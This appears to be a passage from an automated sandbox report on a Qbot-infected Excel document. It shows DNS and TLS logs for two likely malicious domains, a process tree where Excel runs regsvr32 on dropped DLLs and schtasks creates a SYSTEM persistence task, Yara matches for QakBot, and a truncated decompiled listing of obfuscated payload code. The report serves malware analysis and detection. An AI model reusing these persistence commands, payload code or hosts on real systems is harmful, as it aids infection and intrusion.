Jun 11, 2021 11:03:14.027370930 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 11, 2021 11:03:45.065171957 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:03:45.139734983 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 11, 2021 11:03:46.520637035 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:03:46.584225893 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 11, 2021 11:04:06.286187887 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:04:06.346257925 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 11, 2021 11:04:06.890294075 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:04:06.940583944 CEST	53	56338	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 11, 2021 11:02:09.937530041 CEST	192.168.2.3	8.8.8.8	0x4093	Standard query (0)	shadiinfo.com	A (IP address)	IN (0x0001)
Jun 11, 2021 11:02:11.481847048 CEST	192.168.2.3	8.8.8.8	0xbc93	Standard query (0)	treasurechestcaribbean.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 11, 2021 11:02:10.004744053 CEST	8.8.8.8	192.168.2.3	0x4093	No error (0)	shadiinfo.com		43.225.55.182	A (IP address)	IN (0x0001)
Jun 11, 2021 11:02:11.669271946 CEST	8.8.8.8	192.168.2.3	0xbc93	No error (0)	treasurechestcaribbean.com		192.185.33.154	A (IP address)	IN (0x0001)
Jun 11, 2021 11:04:06.346257925 CEST	8.8.8.8	192.168.2.3	0xa285	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 11, 2021 11:02:10.357153893 CEST	43.225.55.182	443	192.168.2.3	49720	CN=shadiinfo.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri May 14 13:03:47 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Thu Aug 12 13:03:47 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024
Jun 11, 2021 11:02:11.996078014 CEST	192.185.33.154	443	192.168.2.3	49723	CN=*.treasurechestcaribbean.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat May 15 10:36:32 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Fri Aug 13 10:36:32 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3348 Parent PID: 792

General

Start time:	11:02:01
Start date:	11/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x850000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: splwow64.exe PID: 4272 Parent PID: 3348

General

Start time:	11:02:03
Start date:	11/06/2021
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff71efd0000
File size:	130560 bytes
MD5 hash:	8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4760 Parent PID: 3348

General

Start time:	11:02:12
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s ..\covi1.dll
Imagebase:	0x1320000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, Author: Joe Security Rule: QakBot, Description: QakBot Payload, Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 5828 Parent PID: 4760

General

Start time:	11:02:16
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x1180000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Author: Joe Security Rule: QakBot, Description: QakBot Payload, Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Author: kevoreilly
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6104 Parent PID: 3348

General

Start time:	11:02:17
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s ..\covi2.dll
Imagebase:	0x1320000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 4144 Parent PID: 5828

General

Start time:	11:02:17
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16
Imagebase:	0xe60000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5672 Parent PID: 4144

General

Start time:	11:02:17
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6092 Parent PID: 528

General

Start time:	11:02:19
Start date:	11/06/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\covi1.dll'
Imagebase:	0x7ff755e40000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3360 Parent PID: 6092

General

Start time:	11:02:21
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\covi1.dll'
Imagebase:	0xea0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4152 Parent PID: 3360

General

Start time:	11:02:24
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652
Imagebase:	0x330000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3676 Parent PID: 528

General

Start time:	11:04:00
Start date:	11/06/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\covi1.dll'
Imagebase:	0x7ff62a3b0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3056 Parent PID: 3676

General

Start time:	11:04:00
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\covi1.dll'
Imagebase:	0x10b0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5744 Parent PID: 3056

General

Start time:	11:04:02
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652
Imagebase:	0x1070000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 4760 Parent PID: 3348 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	68%
Total number of Nodes:	25
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B32559, Relevance: 3.2, APIs: 1, Instructions: 1688
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00B32559(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t809;
				signed int _t811;
				void* _t813;
				signed int _t814;
				signed int _t816;
				void* _t818;
				void* _t820;
				signed int _t821;
				void* _t824;
				void* _t826;
				intOrPtr _t827;
				signed int _t828;
				void* _t829;
				void* _t831;
				void* _t833;
				signed int _t834;
				signed int _t836;
				signed int _t837;
				signed int _t839;
				void* _t841;
				void* _t842;
				signed int _t846;
				void* _t848;
				signed int _t849;
				signed int _t852;
				void* _t854;
				intOrPtr _t855;
				signed int _t857;
				void* _t859;
				signed int _t860;
				signed int _t863;
				void* _t866;
				signed int _t868;
				void* _t870;
				intOrPtr _t873;
				void* _t875;
				void* _t876;
				signed int _t879;
				signed int _t881;
				void* _t883;
				void* _t884;
				signed int _t886;
				void* _t887;
				signed int _t891;
				signed int _t895;
				void* _t897;
				void* _t898;
				signed int _t900;
				void* _t902;
				void* _t903;
				signed int _t906;
				void* _t908;
				void* _t909;
				signed int _t913;
				signed int _t917;
				signed int _t920;
				signed int _t923;
				signed int _t924;
				signed int _t928;
				intOrPtr _t937;
				signed int _t939;
				void* _t941;
				signed int _t943;
				signed int _t945;
				void* _t947;
				signed int _t948;
				signed int _t953;
				void* _t955;
				signed int _t966;
				signed int _t968;
				signed int _t974;
				void* _t976;
				signed int _t980;
				signed int _t983;
				signed int _t984;
				signed int _t986;
				void* _t988;
				void* _t989;
				signed int _t993;
				void* _t995;
				signed int _t996;
				signed int _t1001;
				signed int _t1002;
				signed int _t1006;
				signed int _t1007;
				signed int _t1009;
				void* _t1019;
				void* _t1021;
				signed int _t1022;
				signed int _t1024;
				void* _t1026;
				signed int _t1027;
				signed int _t1028;
				void* _t1030;
				void* _t1032;
				void* _t1033;
				void* _t1037;
				void* _t1039;
				void* _t1040;
				signed int _t1043;
				intOrPtr _t1044;
				signed int _t1047;
				signed int _t1052;
				signed int _t1053;
				signed int _t1056;
				signed int _t1059;
				signed int _t1061;
				signed int _t1064;
				signed int _t1071;
				signed int _t1075;
				signed int _t1077;
				signed int _t1079;
				signed int _t1081;
				signed int _t1083;
				signed int _t1089;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1105;
				signed int _t1110;
				signed int _t1112;
				signed int _t1114;
				signed int _t1116;
				signed int _t1118;
				intOrPtr _t1121;
				signed int _t1125;
				signed int _t1128;
				signed int _t1130;
				signed int _t1138;
				void* _t1141;
				signed int _t1145;
				signed int _t1147;
				void* _t1150;
				signed int _t1152;
				signed int _t1154;
				signed int _t1169;
				signed int _t1171;
				signed int _t1173;
				void* _t1176;
				signed int _t1186;
				signed int _t1188;
				signed int _t1190;
				signed int _t1200;
				signed int _t1202;
				signed int _t1204;
				signed int _t1206;
				void* _t1209;
				signed int _t1211;
				signed int _t1213;
				signed int _t1226;
				signed int _t1229;
				signed int _t1232;
				signed int _t1234;
				signed int _t1236;
				signed int _t1238;
				signed int _t1245;
				signed int _t1247;
				signed int _t1248;
				signed int _t1265;
				signed int _t1268;
				signed int _t1270;
				signed int _t1272;
				signed int _t1279;
				signed int _t1282;
				void* _t1283;
				signed int _t1285;
				signed int _t1288;
				signed int _t1291;
				signed int _t1295;
				signed int _t1296;
				void* _t1300;
				signed int _t1302;
				signed int _t1305;
				signed int _t1307;
				signed int _t1308;
				void* _t1311;
				void* _t1313;
				signed int _t1320;
				void* _t1324;
				signed int _t1326;
				void* _t1329;
				signed int _t1331;
				signed int _t1340;
				signed int _t1345;
				signed int _t1347;
				signed int _t1350;
				signed int _t1352;
				signed int _t1355;
				signed int _t1358;
				signed int _t1360;
				signed int _t1363;
				void* _t1366;
				signed int _t1367;
				signed int _t1371;
				signed int _t1374;
				signed int _t1376;
				signed int _t1385;
				signed int _t1388;
				void* _t1389;
				signed int _t1394;
				signed int _t1397;
				void* _t1398;
				signed int _t1404;
				signed int _t1407;
				signed int _t1410;
				signed int _t1415;
				signed int _t1416;
				signed int _t1419;
				signed int _t1422;
				void* _t1425;
				void* _t1426;
				signed int _t1428;
				signed int _t1440;
				signed int* _t1441;
				signed int* _t1442;
				signed int* _t1443;
				signed int* _t1444;
				signed int* _t1445;
				signed int* _t1446;
				signed int* _t1447;
				signed int* _t1448;
				signed int* _t1449;
				signed int* _t1450;
				intOrPtr* _t1451;
				signed int* _t1452;
				int* _t1453;
				signed int* _t1456;
				signed int* _t1457;
				signed int* _t1458;
				signed int* _t1459;
				signed int* _t1460;
				signed int* _t1461;
				signed int* _t1462;
				signed int* _t1463;
				signed int* _t1464;
				signed int* _t1465;
				signed int* _t1466;
				signed int* _t1467;
				signed int* _t1468;

				_t1345 = __esi;
				_t1279 = __edi;
				_t1223 = __edx;
				_t1068 = __ecx;
				_t1053 = __ebx;
				_push(__ecx);
				 *_t1440 =  *_t1440 & 0x00000000;
				 *_t1440 =  *_t1440 ^ _t1415;
				_t1416 = _t1440;
				_t1441 = _t1440 + 0xfffffff0;
				if( *(__ebx + 0x45f45f) == 0) {
					_push(__ebx);
					 *_t1441 =  *_t1441 & 0x00000000;
					 *_t1441 =  *_t1441 | __ecx;
					_push(__ecx);
					 *_t1441 =  *_t1441 & 0x00000000;
					 *_t1441 =  *_t1441 + __edx;
					_push( *((intOrPtr*)(__ebx + 0x45f2ea)));
					_t809 =  *((intOrPtr*)(__ebx + 0x460024))();
					_push(__ecx);
					 *(__ebx + 0x45f45f) =  *(__ebx + 0x45f45f) & 0x00000000;
					 *(__ebx + 0x45f45f) =  *(__ebx + 0x45f45f) ^ __ecx & 0x00000000 ^ _t809;
					_pop( *_t8);
					_t1223 = 0 ^ _v12;
					_pop( *_t10);
					_t1068 = _v20;
				}
				if( *((intOrPtr*)(_t1053 + 0x45f698)) == 0) {
					if( *(_t1053 + 0x45ff40) == 0) {
						 *_t1441 =  *_t1441 ^ _t809;
						 *_t1441 = _t1068;
						 *_t1441 =  *_t1441 ^ _t1068;
						 *_t1441 =  *_t1441 | _t1223;
						_t1052 =  *((intOrPtr*)(_t1053 + 0x460024))( *((intOrPtr*)(_t1053 + 0x45f499)), _t1068, _t809);
						_v20 = _t1279;
						 *(_t1053 + 0x45ff40) =  *(_t1053 + 0x45ff40) & 0x00000000;
						 *(_t1053 + 0x45ff40) =  *(_t1053 + 0x45ff40) ^ _t1279 ^ _v20 ^ _t1052;
						_t1279 = _v20;
						_t1223 =  *_t1441;
						_t1468 =  &(_t1441[1]);
						_t1068 = 0 ^  *_t1468;
						_t1441 =  &(_t1468[1]);
					}
					 *_t1441 = _t1068;
					 *_t1441 =  *_t1441 & 0x00000000;
					 *_t1441 =  *_t1441 + _t1223;
					_v20 = _v20 & 0x00000000;
					 *_t1441 =  *_t1441 + _t1053 + 0x45fac1;
					_t1019 =  *((intOrPtr*)(_t1053 + 0x460028))(_v20, _t1279, _v16);
					 *_t1441 =  *_t1441 & 0x00000000;
					 *_t1441 =  *_t1441 + _t1019;
					 *_t1441 =  *_t1441 - _t1279;
					 *_t1441 =  *_t1441 + _t1053 + 0x45f766;
					_t1021 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1279, _t1068);
					_t1200 = (_t1068 & 0x00000000) +  *_t1441;
					_t1462 =  &(_t1441[1]);
					_v20 = _t1279;
					_push(_t1200 + _t1021);
					_t1340 = _v20;
					_pop(_t1022);
					_t1202 = _t1200 & 0x00000000 ^ _t1345 & 0x00000000 ^  *(_t1053 + 0x45f027);
					_t1404 = _t1345;
					if(_t1202 > _t1022) {
						 *_t1462 =  *_t1462 & 0x00000000;
						 *_t1462 =  *_t1462 ^ _t1053 + 0x0045fac1;
						 *_t1462 =  *_t1462 & 0x00000000;
						 *_t1462 =  *_t1462 ^ _t1053 + 0x0045f766;
						_t1022 =  *((intOrPtr*)(_t1053 + 0x46002c))(_t1416, _t1416);
					}
					 *(_t1053 + 0x45fa3b) =  *(_t1053 + 0x45fa3b) & 0x00000000;
					 *(_t1053 + 0x45fa3b) =  *(_t1053 + 0x45fa3b) ^ (_t1404 ^  *_t1462 | _t1022);
					_t1407 = _t1404;
					 *_t1462 =  *_t1462 ^ _t1202;
					 *_t1462 = _t1053 + 0x45f608;
					_t1024 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1202, 1);
					_v20 = 0;
					 *_t1462 =  *_t1462 | _t1024;
					_v16 = 0;
					 *_t1462 =  *_t1462 + _t1053 + 0x45f70e;
					_t1026 =  *((intOrPtr*)(_t1053 + 0x460028))(_v16, _v20);
					_t1204 =  *_t1462;
					_t1463 = _t1462 - 0xfffffffc;
					 *_t49 = _t1026;
					_v12 = _v12 + _t1204;
					_push(_v12);
					_pop(_t1027);
					_t1265 = _t1223;
					_t1206 = _t1204 & 0x00000000 ^ (_t1340 & 0x00000000 |  *(_t1053 + 0x45f54c));
					_t1279 = _t1340;
					if(_t1206 > _t1027) {
						 *_t1463 =  *_t1463 ^ _t1416;
						 *_t1463 =  *_t1463 ^ _t1053 + 0x0045f608;
						 *_t1463 = _t1053 + 0x45f70e;
						_t1027 =  *((intOrPtr*)(_t1053 + 0x46002c))(_v20, _t1416);
					}
					 *_t1463 = _t1407;
					 *(_t1053 + 0x45fc52) = 0 ^ _t1027;
					_t1410 = 0;
					_t1028 =  *((intOrPtr*)(_t1053 + 0x460024))();
					 *_t1463 =  *_t1463 - _t1053;
					 *_t1463 =  *_t1463 | _t1028;
					 *_t1463 = _t1053 + 0x45fe49;
					_t1030 =  *((intOrPtr*)(_t1053 + 0x460028))(_v20, _t1053);
					 *_t1463 =  *_t1463 & 0x00000000;
					 *_t1463 =  *_t1463 + _t1030;
					 *_t1463 =  *_t1463 - _t1053;
					 *_t1463 =  *_t1463 + _t1053 + 0x45f1be;
					_t1032 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1053, _t1416);
					_t1464 = _t1463 - 0xfffffffc;
					_v20 = _t1265;
					_push((_t1206 & 0x00000000 |  *_t1463) + _t1032);
					_t1268 = _v20;
					_pop(_t1033);
					_push( *((intOrPtr*)(_t1053 + 0x45fe64)));
					_pop( *_t68);
					_push(_v20);
					_pop(_t1209);
					if(_t1209 > _t1033) {
						_v20 = _v20 & 0x00000000;
						 *_t1464 =  *_t1464 + _t1053 + 0x45fe49;
						 *_t1464 =  *_t1464 ^ _t1410;
						 *_t1464 =  *_t1464 ^ _t1053 + 0x0045f1be;
						_t1047 =  *((intOrPtr*)(_t1053 + 0x46002c))(_t1410, _v20);
						_v16 = _t1410;
						 *(_t1053 + 0x45fdf5) =  *(_t1053 + 0x45fdf5) & 0x00000000;
						 *(_t1053 + 0x45fdf5) =  *(_t1053 + 0x45fdf5) | _t1410 ^ _v16 | _t1047;
						_t1410 = _v16;
					}
					_t1465 = _t1464 - 0xfffffffc;
					 *_t83 =  *_t1464;
					_push(_v20);
					_pop( *_t85);
					if( *((intOrPtr*)(_t1053 + 0x45fbfc)) == 0) {
						_t1044 =  *((intOrPtr*)(_t1053 + 0x460024))( *((intOrPtr*)(_t1053 + 0x45f734)));
						_push(0);
						 *_t1465 = _t1268;
						 *((intOrPtr*)(_t1053 + 0x45fbfc)) = _t1044;
					}
					_t1270 =  *_t1465;
					_t1466 =  &(_t1465[1]);
					_pop( *_t90);
					_v16 = 0;
					 *_t1466 =  *_t1466 + _v20;
					_v20 = 0;
					 *_t1466 =  *_t1466 | _t1270;
					 *_t1466 =  *_t1466 ^ _t1279;
					 *_t1466 =  *_t1466 + _t1053 + 0x45fe9e;
					_t1037 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1279, _v20, _v16);
					 *_t1466 =  *_t1466 ^ _t1053;
					 *_t1466 =  *_t1466 + _t1037;
					 *_t1466 = _t1053 + 0x45f8d9;
					_t1039 =  *((intOrPtr*)(_t1053 + 0x460028))(_v12, _t1053);
					_pop( *_t101);
					_t1211 = _v12;
					 *_t103 = _t1039;
					_v16 = _v16 + _t1211;
					_push(_v16);
					_pop(_t1040);
					_t1272 = _t1270;
					_v16 = _t1410;
					_t1213 = _t1211 & 0x00000000 ^ (_t1410 - _v16 |  *(_t1053 + 0x45f137));
					_t1345 = _v16;
					if(_t1213 > _t1040) {
						_v16 = 0;
						 *_t1466 =  *_t1466 + _t1053 + 0x45fe9e;
						_v16 = _v16 & 0x00000000;
						 *_t1466 =  *_t1466 ^ _t1053 + 0x0045f8d9;
						_t1043 =  *((intOrPtr*)(_t1053 + 0x46002c))(_v16, _v16);
						_v12 = _t1213;
						 *(_t1053 + 0x45f278) =  *(_t1053 + 0x45f278) & 0x00000000;
						 *(_t1053 + 0x45f278) =  *(_t1053 + 0x45f278) | _t1213 & 0x00000000 | _t1043;
					}
					_t1223 = (_t1272 & 0x00000000) +  *_t1466;
					_t1467 = _t1466 - 0xfffffffc;
					_t1068 =  *_t1467;
					_t1441 =  &(_t1467[1]);
				}
				 *_t1441 = _t1223;
				 *_t1441 =  *_t1441 - _t1345;
				 *_t1441 =  *_t1441 + _t1068;
				 *_t1441 =  *_t1441 & 0x00000000;
				 *_t1441 =  *_t1441 + _t1053 + 0x45f37a;
				_t811 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1053, _t1345, _v16);
				_v12 = _v12 & 0x00000000;
				 *_t1441 =  *_t1441 ^ _t811;
				_v12 = _v12 & 0x00000000;
				 *_t1441 =  *_t1441 ^ _t1053 + 0x0045fdc2;
				_t813 =  *((intOrPtr*)(_t1053 + 0x460028))(_v12, _v12);
				_pop( *_t136);
				 *_t138 = _t813;
				_v16 = _v16 + (_t1068 & 0x00000000 | _v12);
				_push(_v16);
				_pop(_t814);
				_t1347 = _t1345;
				_v12 = _t1279;
				_t1071 = 0 ^  *(_t1053 + 0x45f9ce);
				_t1282 = _v12;
				if(_t1071 > _t814) {
					 *_t1441 =  *_t1441 & 0x00000000;
					 *_t1441 =  *_t1441 ^ _t1053 + 0x0045f37a;
					_v20 = 0;
					 *_t1441 =  *_t1441 ^ _t1053 + 0x0045fdc2;
					_t814 =  *((intOrPtr*)(_t1053 + 0x46002c))(_v20, _t1347);
				}
				_push(_t1071);
				 *(_t1053 + 0x45f75e) =  *(_t1053 + 0x45f75e) & 0x00000000;
				 *(_t1053 + 0x45f75e) =  *(_t1053 + 0x45f75e) | _t1071 & 0x00000000 ^ _t814;
				_v12 = 0;
				_push(_v12);
				 *_t1441 =  *_t1441 | _t1053 + 0x0045fb7c;
				if( *((intOrPtr*)(_t1053 + 0x45f8b9)) == 0) {
					 *_t159 =  *((intOrPtr*)(_t1053 + 0x460024))(0xffffffc2);
					_push(_v12);
					_pop( *_t161);
				}
				_t816 =  *((intOrPtr*)(_t1053 + 0x460028))();
				 *_t1441 =  *_t1441 ^ _t1223;
				 *_t1441 =  *_t1441 ^ _t816;
				_v12 = 0;
				 *_t1441 =  *_t1441 | _t1053 + 0x0045f4ef;
				_t818 =  *((intOrPtr*)(_t1053 + 0x460028))(_v12, _t1223);
				_v16 = _v16 & 0x00000000;
				 *_t1441 =  *_t1441 + _t818;
				 *_t1441 = _t1053 + 0x45fcd1;
				_t820 =  *((intOrPtr*)(_t1053 + 0x460028))(_v12, _v16);
				_pop( *_t173);
				_t1075 = _v20;
				 *_t1441 =  *_t1441 | _t1282;
				_t1283 = _t820;
				_t821 = _t1283 + _t1075;
				_t1285 = 0;
				_v20 = _t1285;
				_t1077 = _t1075 & 0x00000000 | _t1285 - _v20 |  *(_t1053 + 0x45f658);
				_t1288 = _v20;
				if(_t1077 > _t821) {
					 *_t1441 = _t1053 + 0x45f4ef;
					_v12 = 0;
					 *_t1441 =  *_t1441 + _t1053 + 0x45fcd1;
					_t821 =  *((intOrPtr*)(_t1053 + 0x46002c))(_v12, _v12);
				}
				 *(_t1053 + 0x45f756) =  *(_t1053 + 0x45f756) & 0x00000000;
				 *(_t1053 + 0x45f756) =  *(_t1053 + 0x45f756) | _t1347 ^  *_t1441 ^ _t821;
				_t1350 = _t1347;
				 *_t1441 =  *_t1441 ^ _t1350;
				 *_t1441 =  *_t1441 + _t1053 + 0x45f918;
				 *_t1441 =  *_t1441 & 0x00000000;
				 *_t1441 =  *_t1441 + _t1053 + 0x45f7ae;
				_t824 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1077, _t1350);
				 *_t1441 =  *_t1441 - _t1077;
				 *_t1441 =  *_t1441 + _t824;
				 *_t1441 =  *_t1441 & 0x00000000;
				 *_t1441 =  *_t1441 + _t1053 + 0x45f95d;
				_t826 =  *((intOrPtr*)(_t1053 + 0x460028))(_t1416, _t1077);
				_t1079 = _t1077 & 0x00000000 ^  *_t1441;
				_t1442 =  &(_t1441[1]);
				_v12 = _t1053;
				_push(_t1079 + _t826);
				_t1056 = _v12;
				_pop(_t827);
				_t1081 = _t1079 & 0x00000000 | _t1416 ^  *_t1442 |  *(_t1056 + 0x45fba7);
				_t1419 = _t1416;
				if(_t1081 > _t827) {
					_t197 = _t1056 + 0x45f7ae; // 0x45f7ae
					 *_t1442 =  *_t1442 & 0x00000000;
					 *_t1442 =  *_t1442 ^ _t197;
					_t198 = _t1056 + 0x45f95d; // 0x45f95d
					_v12 = 0;
					 *_t1442 =  *_t1442 ^ _t198;
					_t827 =  *((intOrPtr*)(_t1056 + 0x46002c))(_v12, _t1223);
				}
				 *_t1442 = _t1419;
				 *((intOrPtr*)(_t1056 + 0x45f44f)) = _t827;
				_t1422 = 0;
				_t828 =  *((intOrPtr*)(_t1056 + 0x460028))();
				if( *(_t1056 + 0x45f453) == 0) {
					_v20 = 0;
					 *_t1442 =  *_t1442 + _t828;
					 *_t1442 =  *_t1442 & 0x00000000;
